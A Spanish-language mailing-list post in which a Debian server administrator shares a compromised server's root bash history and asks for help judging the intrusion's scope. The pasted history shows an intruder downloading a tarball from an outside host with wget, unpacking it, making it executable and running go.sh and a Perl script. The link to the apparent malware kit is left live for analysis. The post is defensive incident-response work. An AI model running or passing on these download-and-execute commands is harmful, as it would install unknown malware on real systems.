Posible intrusión un server

[ciracusa <ciracusa@gmail.com>]

Lista, buenas tardes.

Perdón si este tema no esta directamente relacionado con Debian, pero 
como el server en cuestión tiene Squeeze y es un tema de seguridad creo 
que puede interesarles a mas de uno.

Ayer viendo el history de root de un servidor veo lo siguiente:

  314  ./go.sh 189
  315  w
  316  cd
  317  cd /var/tmp/
  318  rm -rf gosh
  319  ls -a
  320  exit
  321  cat /proc/cpuinfo
  322  passwd
  323  cd /var/tmp/
  324  cd gosh
  325  touch bios.txt
  326  chmod +x *
  327  screen
  328  exit
  329  cat /proc/cpuinfo
  330  cd /var/tmp/
  331  ls -a
  332  wget http://gblteam.webs.com/gosh.tgz.tar
  333  tar zxvf gosh.tgz.tar
  334  rm -rf gosh.tgz.tar
  335  cd gosh
  336  touch bios.txt
  337  chmod +x *
  338  ./go.sh 200
  339  cd
  340  cd /var/tmp/
  341  ls -a
  342  rm -rf gosh
  343  ls -a
  344  exit
  345  cd /var/tmp/
  346  perl x.pl


Que opinan?

Entiendo -lamentablemente- que el server fue comprometido, pero lo que 
no llego a comprender es el alcance de esto.

Notar que puse el link para que puedan descargarlo uds. también y 
analizarlo (tomando las precauciones del caso).

Bueno, si alguien tiene algo de info muy agradecido.

Y si pueden recomendarme algunos pasos para analizar la seguridad del 
server desde ya muchas gracias.

Salu2.